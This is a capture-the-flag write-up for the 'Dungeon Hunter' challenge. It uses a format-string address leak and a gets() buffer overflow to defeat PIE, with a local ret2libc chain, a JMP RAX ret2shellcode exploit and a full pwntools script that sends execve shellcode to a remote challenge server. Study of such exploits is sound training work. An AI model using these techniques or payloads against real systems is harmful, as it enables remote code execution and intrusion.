Decode-E-Cyber CTF 2023 — PWN/Binary Exploitation Writeup — 2

Nov 6, 2023

I participated in Decode-E-Cyber CTF 2023, conducted by OWASP VIT Bhopal, and our team, Team Pegasus, won first place with 1350 points. We cracked many challenges, and I was the only one who solved the PWN / Binary Exploitation challenges in the event.

This is the Part 2 writeup for the Binary Exploitation challenges.

Challenge 2: Dungeon Hunter

Difficulty: Medium — Hard

The organizers provided the original compiled binary for this challenge. Let’s explore.

Nice! The binary has no stack cookie, and NX (the non-executable stack protection) is disabled, so if there is a buffer overflow we can exploit it with shellcode on the stack. However, PIE (Position Independent Executable) was enabled at compile time, so the base address of the executable will be randomized each time the program starts.

Keep in mind that the base address won’t be 100% random; there will be some identifiable patterns.

Let’s run the executable and explore!

The program accepts user-supplied input twice. The first input is reflected directly in the output; after the second input, nothing visible happens.

The binary has PIE, so we might need to leak addresses in order to exploit it. As the first input is reflected in the output, there’s a chance that the binary is vulnerable to a format string (memory leak) vulnerability.

Let’s try that by supplying a format specifier as input to the program.

Yes! The program is vulnerable to a format string vulnerability, and it is also vulnerable to a buffer overflow via the second input.

Note: You can also use any decompiler like Ghidra to decompile the binary and find the vulnerability by looking at the code. Here, I found it manually.

Cool! Now we can use any debugger to analyze the program and the crash to exploit it.

GDB is our best friend. I am using Pwndbg, a GDB extension for exploit development.

Use ‘info functions’ to list all the functions inside the binary. Note that there are 2 functions that are defined by the developer of this program, all of the other functions that are displayed are default functions/symbols added by the compiler.

Note: GDB (and therefore Pwndbg) turns ASLR off by default for the program it launches, so the PIE base will not be randomized inside Pwndbg. That means the base address of the binary will always be the same there.

Let’s analyze the leak and the crash in gdb.

It leaked a value from the binary and crashed at some point. We’ll come to the crash later. Let’s look at what address it leaks.

We can look at the memory map of the process using vmmap command in Pwndbg.

The leaked address is 0x5555555560a7 and the base address (starting address) of the binary is 0x555555554000. Since the leaked value sits just above that base and shares the same 0x5555555 prefix, we can confirm that it is an address inside the binary itself.

We can use Python to calculate the base address of the binary.

It’s just a simple subtraction to identify the correct base address from the leaked value. The base address of the binary is 8359 (0x20a7) bytes below the leaked address.
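The subtraction can be reproduced in a few lines of Python. This is a minimal sketch using the two values seen inside Pwndbg; the variable names are only illustrative.

```python
# Values observed inside Pwndbg (ASLR is disabled by the debugger)
leaked_addr = 0x5555555560a7   # value printed by the format string leak
binary_base = 0x555555554000   # start of the binary's mapping, from vmmap

# Distance between the leak and the base address
leak_offset = leaked_addr - binary_base
print(leak_offset, hex(leak_offset))  # 8359 0x20a7
```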

We found the offset, but the addresses will be random outside Pwndbg, right? Well, yes, but with PIE/ASLR only the base address is randomized. In simple words: everything inside the binary/executable stays at the same offset from the base, and only the starting address changes on each run.

So, we can calculate the base address with the leaked address.

Let’s run the program outside gdb to make sure the leaked addresses are randomized each time the program starts as a new process.

Yes, it is randomized each time. Okay, but is it completely random? The answer is no. It’s not 100% random; there’s a noticeable pattern in each leak.

It always starts with 0x5.. and ends with 0a7. The ending is constant because the base address is page-aligned (a multiple of 0x1000), and we already know the distance between the leak and the executable’s base address: 8359, which is 0x20a7 in hex.

The offset will be the same even if the base address is randomized.
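To see why the offset survives randomization, here is a small simulation. It is only a sketch: the random bases are made up by the script (they are not real leaks), and the one assumption is that the loader picks a page-aligned base, which is why the last three hex digits of the leak stay the same.

```python
import random

LEAK_OFFSET = 0x20a7  # distance from the binary base to the leaked address
PAGE_SIZE = 0x1000    # mappings start on 4 KiB page boundaries

def base_from_leak(leak: int) -> int:
    """Recover the binary base from a leaked address."""
    return leak - LEAK_OFFSET

rng = random.Random(1337)  # fixed seed so the run is repeatable
for _ in range(5):
    # Hypothetical randomized base: page-aligned, starting with 0x55...
    fake_base = 0x550000000000 + rng.randrange(0, 1 << 28) * PAGE_SIZE
    leak = fake_base + LEAK_OFFSET
    assert leak & 0xfff == 0x0a7              # low 12 bits never change
    assert base_from_leak(leak) == fake_base  # subtraction recovers the base
    print(hex(leak), "->", hex(base_from_leak(leak)))
```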

Cool! Now let’s analyze the crash in Gdb to find exactly where the program crashes on user input.

The ‘cyclic’ command in Pwndbg can generate long strings with a cyclic pattern that can be used to identify the right offset where the crash happens.

I created a 200-character string using cyclic to supply as input to the program.

The return pointer of the program is overwritten with 0x616161616161616a. The return pointer will be on top of the stack, and that’s now overwritten with ‘jaaaaaaa’.

We can use cyclic command to find the exact offset.

The offset is 72. We have control over the return pointer at the offset 72.
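For readers without Pwndbg at hand, the lookup can be approximated in plain Python. This is a sketch, not Pwndbg’s own implementation: it uses a generic de Bruijn sequence generator over lowercase letters with 8-byte windows, which I assume matches the start of the pattern that cyclic produced here.

```python
import itertools
import string
import struct

def de_bruijn(alphabet: bytes, n: int):
    """Lazily yield a de Bruijn sequence: every n-byte window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

# 200 bytes of pattern, 8-byte windows (one window per 64-bit register)
pattern = bytes(itertools.islice(de_bruijn(string.ascii_lowercase.encode(), 8), 200))

crash_value = 0x616161616161616a          # value that overwrote the return pointer
needle = struct.pack("<Q", crash_value)   # little-endian bytes as they sat in memory
offset = pattern.find(needle)
print(needle, offset)  # b'jaaaaaaa' 72
```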

Now, we can try to exploit the program!

We got a memory leak
We got control of the return pointer

As we know from checksec’s output, the binary has NX disabled, so the stack is executable: we can place shellcode on the stack and make the return pointer jump to it.

To make it jump to our shellcode, we need the exact address of the second input (the one that holds the shellcode) so that we can point the return pointer at it. But we don’t know that address, and leaking it directly will not work because the leak happens on the first input while the overflow happens on the second.

We could try leaking stack addresses and calculating offsets, but that is unreliable: stack address randomization, environment variables and other shenanigans can shift the layout.

To overcome this limitation, we can use other techniques such as ROP / return-to-libc to exploit the program.

In order to perform a return-to-libc attack, we need to leak libc addresses and calculate the right offsets for libc symbols such as system (the system function) and the string “/bin/sh”.

Spoiler: Return-to-libc is not the solution. It only works on the local machine and won’t work on the target CTF server, because we cannot rely on our local libc to exploit a remote target. You can skip the Ret2Libc part if you are here for the actual solution. I did ret2libc just for fun and practice.

Ret2Libc Attack:

We need to leak libc addresses to pull this off.

I created a small bash script to leak all the addresses.

FYI, on x86-64 Linux, libc addresses typically start with 0x7f regardless of randomization, so I ran the script with grep 0x7f.
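The same idea can be sketched in Python: build one %N$p probe per index and keep the values that look like library addresses. The prefix check is only a heuristic for typical x86-64 Linux (stack addresses also start with 0x7f, so any hit should be confirmed in the debugger), and the sample values for indexes 2 and 37 are made up for illustration.

```python
def probe(index: int) -> bytes:
    """Format string that prints the index-th argument as a pointer."""
    return f"%{index}$p".encode()

def looks_like_libc(value: str) -> bool:
    """Heuristic only: shared libraries (and the stack) usually map at 0x7f..."""
    return value.startswith("0x7f") and len(value) == 14

# Hypothetical leaks keyed by probe index, for illustration only
sample_leaks = {1: "0x5555555560a7", 2: "(nil)", 37: "0x7ffff7df16ca"}

for index, value in sample_leaks.items():
    if looks_like_libc(value):
        print(probe(index).decode(), value)
```

In a real run, each probe would be sent to a fresh process as the first input and the reflected value collected from its output.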

Seems like %37$p leaked an address that looks like it comes from libc.

Let’s check that with Gdb.

Yes, the address leaked is from libc (__libc_start_call_main).

We can use this to calculate the libc base address and other useful addresses and defeat PIE/ASLR.

I used ‘print system’ in GDB to display the exact address of the system() function in libc (__libc_system). We use system() to execute arbitrary commands; passing “/bin/sh” as its argument gives us a shell.

Let’s calculate the Libc base address, offset for /bin/sh and the system function from the leak that we got.

The system function is 152150 bytes above the leaked address (inside __libc_start_call_main, leaked by %37$p).

We can use strings to find /bin/sh inside libc. The string “/bin/sh” is at offset 0x19604f.

Now we’ll calculate libc’s base address using the leaked value.

The libc base is at -161482 from the leak. This means we can get the libc base address by subtracting 161482 from the leaked value (from %37$p).
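Put together, the libc arithmetic looks roughly like this. It is a sketch under two assumptions: the three offsets are the ones measured against the local libc (they will differ on another libc build), and the “/bin/sh” offset is taken relative to the libc base. The leak value passed in is hypothetical.

```python
# Offsets measured against the LOCAL libc (other libc builds will differ)
LEAK_TO_LIBC_BASE = 161482   # leak - libc_base
LEAK_TO_SYSTEM = 152150      # system - leak
BINSH_OFFSET = 0x19604f      # "/bin/sh" string, assumed relative to the libc base

def resolve_libc(leak: int) -> dict:
    """Derive the addresses needed for ret2libc from the %37$p leak."""
    libc_base = leak - LEAK_TO_LIBC_BASE
    return {
        "libc_base": libc_base,
        "system": leak + LEAK_TO_SYSTEM,
        "binsh": libc_base + BINSH_OFFSET,
    }

# Hypothetical %37$p leak, chosen only for illustration
addrs = resolve_libc(0x7ffff7df16ca)
for name, value in addrs.items():
    print(f"{name:10s} {hex(value)}")
```

A quick sanity check is that the computed libc base ends in 000, since libc is also mapped on a page boundary.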

Now that we have calculated all the required addresses, we need 2 ROP gadgets to perform the attack.

Return-oriented programming (ROP) is a technique of reusing assembly instructions / code already present inside the binary to bypass security mitigations like DEP/NX, and to handle situations in which we cannot use shellcode. (Note: If you’re not familiar with ROP, I’d recommend doing a quick Google search on the topic.)

2 ROP Gadgets needed are:

i. POP RDI; RET

ii. RET

POP RDI pops data from the stack and stores it in the RDI register. Why RDI? On x86_64 Linux (System V calling convention), RDI holds the first argument of the function that is about to be called. To get a shell, we need to pass /bin/sh to the system function as its first argument.

A RET gadget is needed to fix the stack alignment when calling system; without it, the exploit may not work and the program might crash immediately without executing /bin/sh.

To find ROP gadgets, I am using a tool called ropper.

Now that we have all the ingredients, let’s build a ret2libc exploit. pwntools is our best friend.
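The chain itself is just a sequence of 8-byte values after the padding. Here is a minimal standard-library sketch of one common ordering; the helper names are mine, and all four addresses in the example call are hypothetical placeholders rather than values taken from the real exploit.

```python
import struct

RET_OFFSET = 72  # offset of the saved return address, found with cyclic

def p64(value: int) -> bytes:
    """Pack an address as 8 little-endian bytes (what pwntools' p64 does)."""
    return struct.pack("<Q", value)

def build_ret2libc(pop_rdi: int, ret: int, binsh: int, system: int) -> bytes:
    chain = b"A" * RET_OFFSET   # filler up to the return address
    chain += p64(ret)           # extra RET to fix the stack alignment
    chain += p64(pop_rdi)       # POP RDI; RET
    chain += p64(binsh)         # value popped into RDI: pointer to "/bin/sh"
    chain += p64(system)        # finally return into system("/bin/sh")
    return chain

# All four addresses below are hypothetical placeholders
payload = build_ret2libc(
    pop_rdi=0x7ffff7dcb725,
    ret=0x55555555501a,
    binsh=0x7ffff7f6004f,
    system=0x7ffff7e16920,
)
print(len(payload))  # 104
```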

Let’s run the exploit.

Yay! Got a shell on the local machine via ret2libc, bypassing PIE/ASLR.

But wait! Can we use the same payload to exploit the program on the remote target? The short answer is no. In simple terms, we did all the calculations against our local libc, and we do not know anything about the target server other than the original binary, so we can’t rely on those libc offsets.

Now what?

We need to find a way to store shellcode on the stack and make the return pointer point to our shellcode.

Ret2Shellcode

We need to examine the program once again to find a way to return to user controlled data / shellcode.

We already know that there are 2 functions in the program: main and dungeon.

Let’s disassemble both functions to find where the program receives the second user input.

It seems the dungeon function calls gets(). That is likely responsible for reading the second user input, and for the crash as well. FYI, gets() is considered dangerous because it performs no bounds checking.

I set a breakpoint after the gets call to analyze the input.

Now, let’s run the program and supply a recognizable string to the second input.

The breakpoint is hit as I expected. Notice that the RAX register holds a pointer to our input: gets() returns a pointer to the buffer it filled, and on x86_64 return values are passed in RAX. This is true right after the call, but a later instruction could overwrite RAX before the function returns, so it is worth checking in the debugger.

We don’t need to know the exact address of our input; we can just use a ROP gadget / instruction like JMP RAX to jump to our shellcode and get a shell.

We can use ropper again to check whether a JMP RAX gadget is available inside the binary.

Cool, JMP RAX gadget is available for use.

Let’s write an exploit with all the ingredients and run it. I used a small x64 shellcode from Exploit-DB online. https://www.exploit-db.com/exploits/46907
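The payload layout can be sketched with the standard library alone. This is not the exact local script, just an illustration: the 0x114f gadget offset and the shellcode bytes are the ones used in the remote exploit further down, the base address is the one seen inside Pwndbg, and the newline check is there because gets() stops reading at a newline byte.

```python
import struct

RET_OFFSET = 72          # saved return address offset, found with cyclic
JMP_RAX_OFFSET = 0x114f  # JMP RAX gadget offset inside the binary

# x64 execve shellcode from Exploit-DB 46907
shellcode = (b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"
             b"\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05")

def build_payload(binary_base: int) -> bytes:
    if len(shellcode) > RET_OFFSET:
        raise ValueError("shellcode does not fit before the return address")
    payload = shellcode.ljust(RET_OFFSET, b"A")  # shellcode first, then filler
    payload += struct.pack("<Q", binary_base + JMP_RAX_OFFSET)
    if b"\n" in payload:
        raise ValueError("gets() stops reading at a newline byte")
    return payload

payload = build_payload(0x555555554000)  # base address seen inside Pwndbg
print(len(shellcode), len(payload))  # 23 80
```

The shellcode sits at the very start of the buffer because that is where RAX points when the function returns.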

Cool. The exploit worked very well and spawned a shell on my local machine.

We got all the ingredients. But before writing the remote exploit, we need to check the address leak on the target server.

The address leaked on our local machine had a pattern, but the pattern was different on the remote CTF server.

On my local machine, when entering %p, the leaked address always started with 0x5.. and ended with 0a7.

On the remote CTF server, the leaked address ends with 0c2 every time.

So using the local leak offset to compute the base address doesn’t work against the target server.

We can notice another thing from calculating the binary base address: the leaked address always ended with 0a7 and the offset was 0x20a7 (8359). Because the base address is page-aligned, the last three hex digits of the leak are always the last three hex digits of the offset.

On the target server, the leak always ends with 0c2. Applying the same logic, and assuming the leaked address sits in the same page of the binary, the offset on the target server might be 0x20c2. We’ll see.
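That guess can be written down as a tiny helper. It is only a sketch of the reasoning: it keeps the page part of the local offset (0x2000) and swaps in the last three hex digits seen on the server. The full remote leak value below is hypothetical; only its 0c2 ending comes from the server.

```python
PAGE_MASK = 0xfff  # low 12 bits: position inside a 4 KiB page

def guess_remote_offset(local_offset: int, remote_leak: int) -> int:
    """Keep the page part of the local offset, take the low 12 bits from the remote leak."""
    return (local_offset & ~PAGE_MASK) | (remote_leak & PAGE_MASK)

# Hypothetical remote leak; only the trailing 0c2 was actually observed
remote_leak = 0x55d3c8a4b0c2
offset = guess_remote_offset(0x20a7, remote_leak)
print(hex(offset), hex(remote_leak - offset))  # 0x20c2 0x55d3c8a49000
```

If the guess is right, the computed base ends in 000; if the leak actually pointed into a different page, the exploit would simply crash and the page part would need adjusting.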

Let’s write a remote exploit.

from pwn import *

# Return address is overwritten at offset 72
RET_OFFSET = 72

proc = remote("134.209.146.48", 1338)

# First input: leak an address inside the binary via the format string bug
proc.sendline(b"%p")
proc.recvuntil(b"et: ")

leak_addr = proc.recv(14).decode()  # "0x" followed by 12 hex digits
leak0 = int(leak_addr, 16)
print(f"Leaked Address of the Binary ==> {hex(leak0)}")

# The remote leak ends with 0c2 (the local one ended with 0a7, offset 0x20a7),
# so the remote offset is guessed to be 0x20c2
binary_base = leak0 - 0x20c2

jmp_rax = p64(binary_base + 0x114f)  # ROP gadget JMP RAX, jumps to the shellcode
ret = p64(binary_base + 0x101a)      # RET gadget (not needed by this payload)

# x64 execve shellcode (Exploit-DB 46907)
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"

# Payload: 23-byte shellcode + 49 junk bytes + address of JMP RAX
payload = shellcode
payload += cyclic(RET_OFFSET - len(shellcode))
payload += jmp_rax

# Second input: overflow the buffer and hijack the return pointer
proc.recv()
proc.sendline(payload)
proc.interactive()

Voila! The exploit worked like a charm.

Grab the Flag!

Hope you learned something. Thanks for reading.

Happy Pwning!

Written by Febin